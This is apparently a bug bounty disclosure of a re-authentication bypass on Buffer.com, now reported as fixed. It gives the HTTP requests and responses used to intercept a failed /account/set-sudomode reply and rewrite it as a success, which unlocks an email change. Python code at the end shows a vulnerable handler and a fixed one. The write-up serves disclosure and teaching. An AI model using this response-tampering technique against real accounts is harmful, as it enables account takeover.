
Buffer Authentication Bypass

Hi everyone, here is one of my findings on Buffer.com, where I managed to bypass the authentication.

The authentication workflow is as follows:

  • To change the account email, the user must provide the current account password.
  • If the password is correct, the application lets you change the account email.

So let's start.

When the user wants to change their account email, the app asks for the current password.

I wanted to compare the responses for a correct and an incorrect password, so here is the request:
```http
POST /account/set-sudomode HTTP/1.1
Date: ...
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword
```

The response for the wrong password:

```http
HTTP/1.1 200 OK
Date: Mon, ...
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}
```

And the response for the correct password:

```http
HTTP/1.1 200 OK
Date: Mon, ...
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}
```

Comparing the two responses, the only difference is that the correct-password response adds a notice_message and "sudomode":"true". So I submitted a wrong password again, say 123456.

The request looks like this:
```http
POST /account/set-sudomode HTTP/1.1
Date: ...
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456
```

Note the csrf_token value in the request: uyr37832rhehr8he7372829hefdgdf

Response:

```http
HTTP/1.1 200 OK
Date: Mon, ...
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}
```

Intercept this response in the proxy and modify it to:

```http
HTTP/1.1 200 OK
Date: Mon, ...
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}
```

Boom: the app now shows you as successfully authenticated and you can change your email. The password check itself ran on the server and failed, but whether the account is in "sudo mode" was decided by what the client read from this response, so editing the response body is enough to skip it. Here is the video proof of concept.
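Added example (not Buffer's code): a minimal Python model of the sudo-mode flow, with an email-change handler that trusts a client-supplied sudomode flag beside a fixed handler that only honours a grant recorded in the server-side session. The user, password hash, TTL and messages are constructed for the demo; the write-up does not say how Buffer's backend decided, so the vulnerable variant is an assumption about the bug class, not a description of their code.

```python
import hashlib
import hmac
import os
import time

# Constructed demo store: one user, PBKDF2 password hash (assumed scheme, not Buffer's).
_SALT = os.urandom(16)


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)


USERS = {"alice": {"pw_hash": _hash("correct-horse"), "email": "alice@example.com"}}
SUDO_TTL = 300  # seconds a sudo grant stays valid; the server, not the client, keeps it


def set_sudomode(session: dict, password: str) -> dict:
    """Password re-check. On success the grant is written to the server session only;
    the response body is informational and nothing downstream should trust it."""
    user = USERS[session["user"]]
    if not hmac.compare_digest(_hash(password), user["pw_hash"]):
        return {"error_message": "Huh That's not your current password"}
    session["sudo_until"] = time.time() + SUDO_TTL
    return {"notice_message": "Great, we believe it's really you", "sudomode": "true"}


def change_email_vulnerable(session: dict, form: dict) -> dict:
    """Bug class from the write-up (assumed model): the handler accepts a flag the
    client sends back, so anyone who edits the set-sudomode response passes."""
    if form.get("sudomode") != "true":
        return {"error_message": "sudo mode required"}
    USERS[session["user"]]["email"] = form["email"]
    return {"notice_message": "email changed"}


def change_email_fixed(session: dict, form: dict) -> dict:
    """Fixed: only the server-held, time-limited grant counts; client fields are ignored."""
    if session.get("sudo_until", 0) < time.time():
        return {"error_message": "sudo mode required"}
    USERS[session["user"]]["email"] = form["email"]
    return {"notice_message": "email changed"}
```

The fixed handler also expires the grant, so a session that authenticated once does not stay in sudo mode indefinitely.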

Status: Fixed
Bounty Rewarded
